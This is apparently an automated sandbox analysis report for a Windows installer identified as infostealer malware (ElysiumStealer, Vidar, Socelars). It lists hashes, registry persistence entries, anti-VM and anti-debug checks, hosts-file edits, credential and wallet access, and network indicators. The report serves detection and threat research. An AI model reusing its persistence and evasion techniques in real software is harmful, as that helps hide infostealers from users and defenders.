Analysis
-
max time kernel
322s -
max time network
1767s -
platform
windows11_x64 -
resource
win11 -
submitted
13-09-2021 13:00
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-fr
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win10-en
General
-
Target
setup_x86_x64_install.exe
-
Size
3.4MB
-
MD5
7279aeead22b91c8176ee932377f2e27
-
SHA1
169aa33bbaacff9d2b1fbef2a8d06456d14c81dc
-
SHA256
8485c644c0a96ff0d9256b10e2c50ee462868432080b6f27869d96edf77a7d0e
-
SHA512
8ddaa2cd804602c0fdde5a85c96067b19338d074980fd0350839e68fea9b113d55af056a3ac3cbb04c47b9ef819c4840031a9fcb817d7a45bb2e35d0184d7697
Malware Config
Signatures
-
ElysiumStealer
ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.
-
Modifies WinLogon for persistence 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\Documents\\5TOoLBEwKjxTgqEGuFABMEWV\\5TOoLBEwKjxTgqEGuFABMEWV.exe\", \"C:\\Recovery\\WindowsRE\\cmd.exe\", \"C:\\PerfLogs\\Q09ckwfoQ4QNEIehWCYu8jha.exe\", \"C:\\Documents and Settings\\msedge.exe\", \"C:\\Users\\Admin\\AppData\\Local\\Temp\\3f-667b0-863-e399b-fdcd9ca876075\\Kenessey\\Bedavishala.exe\"" taskkill.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\Documents\\5TOoLBEwKjxTgqEGuFABMEWV\\5TOoLBEwKjxTgqEGuFABMEWV.exe\"" taskkill.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\Documents\\5TOoLBEwKjxTgqEGuFABMEWV\\5TOoLBEwKjxTgqEGuFABMEWV.exe\", \"C:\\Recovery\\WindowsRE\\cmd.exe\"" taskkill.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\Documents\\5TOoLBEwKjxTgqEGuFABMEWV\\5TOoLBEwKjxTgqEGuFABMEWV.exe\", \"C:\\Recovery\\WindowsRE\\cmd.exe\", \"C:\\PerfLogs\\Q09ckwfoQ4QNEIehWCYu8jha.exe\"" taskkill.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\Documents\\5TOoLBEwKjxTgqEGuFABMEWV\\5TOoLBEwKjxTgqEGuFABMEWV.exe\", \"C:\\Recovery\\WindowsRE\\cmd.exe\", \"C:\\PerfLogs\\Q09ckwfoQ4QNEIehWCYu8jha.exe\", \"C:\\Documents and Settings\\msedge.exe\"" taskkill.exe -
Process spawned unexpected child process 13 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5384 4924 rundll32.exe 36 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4376 4924 rundll32.exe 36 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1176 4924 rundll32.exe 36 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4068 4924 schtasks.exe 36 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8132 4924 schtasks.exe 36 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2612 4924 schtasks.exe 36 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6668 4924 schtasks.exe 36 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4824 4924 schtasks.exe 36 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7676 4924 rundll32.exe 36 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7860 4924 rundll32.exe 36 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5728 4924 rUNdlL32.eXe 36 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 12100 4924 rundll32.exe 36 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 14744 4924 rundll32.exe 36 -
Socelars Payload 2 IoCs
resource yara_rule behavioral2/files/0x000100000002b1b8-204.dat family_socelars behavioral2/files/0x000100000002b1b8-184.dat family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 59 IoCs
description pid Process procid_target PID 4804 created 3284 4804 WerFault.exe 95 PID 1012 created 4652 1012 WerFault.exe 98 PID 4680 created 860 4680 WerFault.exe 99 PID 5280 created 772 5280 WerFault.exe 178 PID 5600 created 5148 5600 WerFault.exe 117 PID 3104 created 5188 3104 WerFault.exe 118 PID 5328 created 3416 5328 WerFault.exe 142 PID 5764 created 5408 5764 WerFault.exe 122 PID 5080 created 1668 5080 WerFault.exe 146 PID 5988 created 1160 5988 WerFault.exe 155 PID 5416 created 5880 5416 WerFault.exe 164 PID 4800 created 5292 4800 WerFault.exe 253 PID 5780 created 5008 5780 WerFault.exe 116 PID 6088 created 5768 6088 WerFault.exe 156 PID 5448 created 5292 5448 WerFault.exe 253 PID 6160 created 4076 6160 nxfOBZ7N7BTND0tSNqWtavVB.exe 371 PID 6336 created 2224 6336 identity_helper.exe 374 PID 6328 created 1560 6328 ObcQTgXH4oFGTP1M9zyegbPI.exe 263 PID 4932 created 6780 4932 WerFault.exe 283 PID 6384 created 3696 6384 WerFault.exe 240 PID 5532 created 7732 5532 WerFault.exe 604 PID 7256 created 6772 7256 WerFault.exe 284 PID 8616 created 7856 8616 WerFault.exe 327 PID 8900 created 6328 8900 WerFault.exe 310 PID 8320 created 7668 8320 Process not Found 335 PID 2572 created 6812 2572 WerFault.exe 456 PID 1692 created 6224 1692 WerFault.exe 303 PID 8996 created 3560 8996 WerFault.exe 467 PID 8400 created 7564 8400 WerFault.exe 320 PID 8488 created 6736 8488 WerFault.exe 281 PID 8800 created 7776 8800 WerFault.exe 331 PID 6692 created 7556 6692 WerFault.exe 478 PID 6432 created 7548 6432 WerFault.exe 322 PID 6532 created 6932 6532 el34zAN.exe 470 PID 8800 created 8928 8800 WerFault.exe 458 PID 6940 created 8128 6940 cmd.exe 469 PID 7820 created 6812 7820 WerFault.exe 456 PID 6340 created 8824 6340 WerFault.exe 473 PID 1036 created 1880 1036 WerFault.exe 465 PID 7576 created 8364 7576 WerFault.exe 548 PID 7264 created 5976 7264 WerFault.exe 570 PID 8900 created 4548 8900 WerFault.exe 597 PID 9688 created 3152 9688 WerFault.exe 616 PID 4768 created 8688 4768 WerFault.exe 613 PID 10040 created 6052 10040 WerFault.exe 542 PID 10032 created 5940 10032 WerFault.exe 539 PID 7912 created 7788 7912 WerFault.exe 557 PID 7712 created 7944 7712 WerFault.exe 555 PID 10640 created 5540 10640 WerFault.exe 671 PID 10712 created 9708 10712 WerFault.exe 674 PID 12228 created 12136 12228 WerFault.exe 686 PID 14312 created 13592 14312 WerFault.exe 705 PID 14868 created 14784 14868 WerFault.exe 715 PID 15300 created 14724 15300 WerFault.exe 713 PID 17120 created 16856 17120 WerFault.exe 732 PID 18052 created 17068 18052 WerFault.exe 733 PID 18120 created 17720 18120 WerFault.exe 738 PID 18532 created 17508 18532 WerFault.exe 736 PID 18692 created 18360 18692 WerFault.exe 745 -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
resource yara_rule behavioral2/memory/860-225-0x00000000034E0000-0x00000000035B1000-memory.dmp family_vidar -
resource yara_rule behavioral2/files/0x000100000002b1b2-154.dat aspack_v212_v242 behavioral2/files/0x000200000002b1ad-156.dat aspack_v212_v242 behavioral2/files/0x000100000002b1b4-161.dat aspack_v212_v242 behavioral2/files/0x000100000002b1b4-160.dat aspack_v212_v242 behavioral2/files/0x000100000002b1b2-159.dat aspack_v212_v242 behavioral2/files/0x000200000002b1ad-155.dat aspack_v212_v242 -
Blocklisted process makes network request 53 IoCs
flow pid Process 424 7300 powershell.exe 427 8172 powershell.exe 441 7496 MsiExec.exe 449 7496 MsiExec.exe 454 7496 MsiExec.exe 459 8172 powershell.exe 463 7496 MsiExec.exe 465 8172 powershell.exe 471 7300 powershell.exe 472 7496 MsiExec.exe 473 7300 powershell.exe 474 7496 MsiExec.exe 475 7496 MsiExec.exe 477 7496 MsiExec.exe 478 7496 MsiExec.exe 483 7496 MsiExec.exe 484 7496 MsiExec.exe 485 7496 MsiExec.exe 488 7496 MsiExec.exe 491 7496 MsiExec.exe 501 7496 MsiExec.exe 507 7496 MsiExec.exe 509 7496 MsiExec.exe 511 7496 MsiExec.exe 512 7496 MsiExec.exe 513 7496 MsiExec.exe 514 7496 MsiExec.exe 516 7496 MsiExec.exe 517 7496 MsiExec.exe 519 7496 MsiExec.exe 520 7496 MsiExec.exe 523 7496 MsiExec.exe 534 7496 MsiExec.exe 536 7496 MsiExec.exe 540 7496 MsiExec.exe 545 7496 MsiExec.exe 548 3532 powershell.exe 549 7496 MsiExec.exe 553 7496 MsiExec.exe 561 7496 MsiExec.exe 562 10036 powershell.exe 566 7496 MsiExec.exe 567 7496 MsiExec.exe 568 7496 MsiExec.exe 569 3532 powershell.exe 571 7496 MsiExec.exe 573 7496 MsiExec.exe 574 10036 powershell.exe 575 7496 MsiExec.exe 578 7496 MsiExec.exe 580 7496 MsiExec.exe 583 7496 MsiExec.exe 584 7496 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts 46807GHF____.exe File opened for modification C:\Windows\system32\drivers\etc\hosts el34zAN.exe File opened for modification C:\Windows\system32\drivers\etc\hosts el34zAN.exe -
Executes dropped EXE 64 IoCs
pid Process 3624 setup_installer.exe 4344 setup_install.exe 4720 Sun152260a303c33a7.exe 836 Sun15d8dfe2c6d17.exe 860 Sun150d896340a863.exe 960 Sun15b61bf18b0f1.exe 4652 Sun15223697c98.exe 4620 Sun157ff8e4440aa.exe 772 Sun150faeb3537d.exe 3284 Sun157a449716c8ee483.exe 1096 Sun1584240df9fe73a3.exe 1560 Sun15b61bf18b0f1.tmp 1100 LzmwAqmV.exe 3004 46807GHF____.exe 1364 Chrome 5.exe 3260 PublicDwlBrowser1100.exe 5008 8602585.exe 5148 2.exe 5188 setup.exe 5356 1565846.exe 5408 udptest.exe 5528 setup_2.exe 5652 3002.exe 5708 setup_2.tmp 5788 jhuuee.exe 5840 setup_2.exe 5904 8.exe 6028 BearVpn 3.exe 6048 setup_2.tmp 3084 3002.exe 5292 Conhost.exe 4616 8399659.exe 1668 3439763.exe 4624 WinHoster.exe 5632 LzmwAqmV.exe 6060 3439763.exe 1160 3140108.exe 5768 3761427.exe 2056 3140108.exe 3700 inupda.exe 5612 inupda.exe 5152 FoxyIDM621d.exe 4184 IDM1.tmp 732 sqtvvs.exe 5760 sqtvvs.exe 980 ultramediaburner.exe 5692 ultramediaburner.tmp 696 UltraMediaBurner.exe 4792 Maemywinery.exe 5660 Bedavishala.exe 1308 LivelyScreenRecJ10.exe 5836 services64.exe 5292 Conhost.exe 3532 powershell.exe 4764 installer.exe 1616 SmartPDF.exe 1364 SmartPDF.tmp 5900 WerFault.exe 1932 BsInstFile.exe 3820 WerFault.exe 4152 Setup.exe 5540 gcleaner.exe 5300 tmp5394_tmp.exe 5208 stats.tmp -
Checks BIOS information in registry 2 TTPs 21 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion NuOAa7zWhZeI6KdcezvqVBXb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion euE204iSV7uVbWi_QxtaWmn3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion SimplInst.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5146653.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6DD7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6589475.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bxdOlK4iXQQhPPAWmVwmPwaS.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion SimplInst.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion OiTbYj2liOBwWBrz534PqRKS.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion SimplInst.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5146653.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7476425.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5646.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion NuOAa7zWhZeI6KdcezvqVBXb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6DD7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bxdOlK4iXQQhPPAWmVwmPwaS.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion OiTbYj2liOBwWBrz534PqRKS.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6589475.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7476425.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5646.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion euE204iSV7uVbWi_QxtaWmn3.exe -
Loads dropped DLL 46 IoCs
pid Process 4344 setup_install.exe 4344 setup_install.exe 4344 setup_install.exe 4344 setup_install.exe 4344 setup_install.exe 1560 Sun15b61bf18b0f1.tmp 5708 setup_2.tmp 6048 setup_2.tmp 3416 rundll32.exe 5880 rundll32.exe 4764 installer.exe 4764 installer.exe 1364 SmartPDF.tmp 1364 SmartPDF.tmp 4764 installer.exe 5208 stats.tmp 5208 stats.tmp 2980 MsiExec.exe 2980 MsiExec.exe 5196 WMIC.exe 7496 MsiExec.exe 7496 MsiExec.exe 7496 MsiExec.exe 7496 MsiExec.exe 7496 MsiExec.exe 7496 MsiExec.exe 7496 MsiExec.exe 7128 KPLohF_US3S56KW4x6jJt6dB.tmp 7496 MsiExec.exe 6964 Uo0kyENcsB7TB0lHYdza7lvT.tmp 7496 MsiExec.exe 7496 MsiExec.exe 4764 installer.exe 6176 regsvr32.exe 6176 regsvr32.exe 7496 MsiExec.exe 7496 MsiExec.exe 8364 rundll32.exe 5976 rundll32.exe 4916 rundll32.exe 6016 MsiExec.exe 6016 MsiExec.exe 7496 MsiExec.exe 3152 rundll32.exe 12136 rundll32.exe 14784 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 20 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\Q09ckwfoQ4QNEIehWCYu8jha = "\"C:\\PerfLogs\\Q09ckwfoQ4QNEIehWCYu8jha.exe\"" taskkill.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msedge = "\"C:\\Documents and Settings\\msedge.exe\"" taskkill.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" jjntfh0WYe_Zt4bQiX6gzMBo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" Z5msPDyEDBitZr1tnMrYbbNP.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\5TOoLBEwKjxTgqEGuFABMEWV = "\"C:\\Users\\Admin\\Documents\\5TOoLBEwKjxTgqEGuFABMEWV\\5TOoLBEwKjxTgqEGuFABMEWV.exe\"" taskkill.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Recovery\\WindowsRE\\cmd.exe\"" taskkill.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 1565846.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce Z5msPDyEDBitZr1tnMrYbbNP.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5TOoLBEwKjxTgqEGuFABMEWV = "\"C:\\Users\\Admin\\Documents\\5TOoLBEwKjxTgqEGuFABMEWV\\5TOoLBEwKjxTgqEGuFABMEWV.exe\"" taskkill.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\msedge = "\"C:\\Documents and Settings\\msedge.exe\"" taskkill.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Common Files\\Saelozhushofa.exe\"" 46807GHF____.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce jjntfh0WYe_Zt4bQiX6gzMBo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\PowerControl\\Mysasywosi.exe\"" el34zAN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bedavishala = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\3f-667b0-863-e399b-fdcd9ca876075\\Kenessey\\Bedavishala.exe\"" taskkill.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup = "C:\\Users\\Admin\\AppData\\Roaming\\Desktop\\Desktop.vbs" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup = "C:\\Users\\Admin\\AppData\\Roaming\\Desktop\\Desktop.vbs" powershell.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Recovery\\WindowsRE\\cmd.exe\"" taskkill.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Q09ckwfoQ4QNEIehWCYu8jha = "\"C:\\PerfLogs\\Q09ckwfoQ4QNEIehWCYu8jha.exe\"" taskkill.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\Bedavishala = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\3f-667b0-863-e399b-fdcd9ca876075\\Kenessey\\Bedavishala.exe\"" taskkill.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA euE204iSV7uVbWi_QxtaWmn3.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7476425.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5646.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6DD7.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA NuOAa7zWhZeI6KdcezvqVBXb.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA bxdOlK4iXQQhPPAWmVwmPwaS.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA OiTbYj2liOBwWBrz534PqRKS.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md8_8eus.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6589475.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5146653.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md8_8eus.exe -
Drops desktop.ini file(s) 2 IoCs
description ioc Process File created C:\Windows\assembly\Desktop.ini IDownload.App.exe File opened for modification C:\Windows\assembly\Desktop.ini IDownload.App.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\Z: SimplInst.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\F: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 12 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 238 ipinfo.io 284 ipinfo.io 295 ipinfo.io 298 ipinfo.io 1 ip-api.com 83 ipinfo.io 237 ipinfo.io 129 ipinfo.io 444 ipinfo.io 48 ipinfo.io 95 ipinfo.io 121 ipinfo.io -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini SimplInst.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini SimplInst.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini SimplInst.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
pid Process 5500 6589475.exe 6528 NuOAa7zWhZeI6KdcezvqVBXb.exe 6944 bxdOlK4iXQQhPPAWmVwmPwaS.exe 7996 euE204iSV7uVbWi_QxtaWmn3.exe 7512 OiTbYj2liOBwWBrz534PqRKS.exe 7200 5146653.exe 7032 7476425.exe 18180 5646.exe 18824 6DD7.exe -
Suspicious use of SetThreadContext 16 IoCs
description pid Process procid_target PID 1668 set thread context of 6060 1668 3439763.exe 151 PID 1160 set thread context of 2056 1160 3140108.exe 157 PID 3700 set thread context of 5612 3700 inupda.exe 169 PID 732 set thread context of 5760 732 sqtvvs.exe 173 PID 3532 set thread context of 4252 3532 powershell.exe 229 PID 6804 set thread context of 7420 6804 RXtSl1kwfxyS_JvhHPdf_3Ug.exe 309 PID 6780 set thread context of 8116 6780 Tlp7KL_8Drd0U39YwFyFiaBJ.exe 340 PID 6160 set thread context of 4648 6160 nxfOBZ7N7BTND0tSNqWtavVB.exe 346 PID 7732 set thread context of 8016 7732 Conhost.exe 352 PID 7540 set thread context of 4592 7540 rffxRXdLIHxPawWrlBawP26B.exe 357 PID 6788 set thread context of 4432 6788 xmeNJZF3MCC7JO_CsRcHz0kw.exe 393 PID 5836 set thread context of 4596 5836 services64.exe 425 PID 5020 set thread context of 8640 5020 cmd.exe 504 PID 7596 set thread context of 8476 7596 8cfNUwE6P_yQV3TE1Ozyy1uo.exe 537 PID 15396 set thread context of 15756 15396 F7C5.exe 724 PID 15948 set thread context of 16704 15948 9D7.exe 731 -
Drops file in Program Files directory 50 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe WerFault.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe TqUaKAjOaYYSlALxbRqe2mlv.exe File opened for modification C:\Program Files (x86)\IDownload\MyDownloader.Core.dll IDownload.tmp File created C:\Program Files (x86)\IDownload\is-VT97P.tmp IDownload.tmp File created C:\Program Files (x86)\IDownload\is-C365I.tmp IDownload.tmp File created C:\Program Files (x86)\IDownload\is-PS7Q4.tmp IDownload.tmp File opened for modification C:\Program Files (x86)\IDownload\unins000.dat IDownload.tmp File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe ikf96lKZ4JnA_XIfWuND_5Rg.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini ikf96lKZ4JnA_XIfWuND_5Rg.exe File opened for modification C:\Program Files (x86)\IDownload\MyDownloader.Extension.dll IDownload.tmp File created C:\Program Files (x86)\IDownload\is-97JRJ.tmp IDownload.tmp File created C:\Program Files (x86)\IDownload\is-C37F7.tmp IDownload.tmp File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe forfiles.exe File created C:\Program Files\Microsoft Office\SEMYQDCVYL\IDownload.exe.config el34zAN.exe File opened for modification C:\Program Files (x86)\IDownload\IDownload.App.exe IDownload.tmp File opened for modification C:\Program Files (x86)\IDownload\MyDownloader.Spider.dll IDownload.tmp File created C:\Program Files (x86)\IDownload\is-UKIR9.tmp IDownload.tmp File created C:\Program Files (x86)\IDownload\is-A4EU2.tmp IDownload.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.ini TqUaKAjOaYYSlALxbRqe2mlv.exe File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp File created C:\Program Files (x86)\Common Files\Saelozhushofa.exe.config 46807GHF____.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\inst001.exe 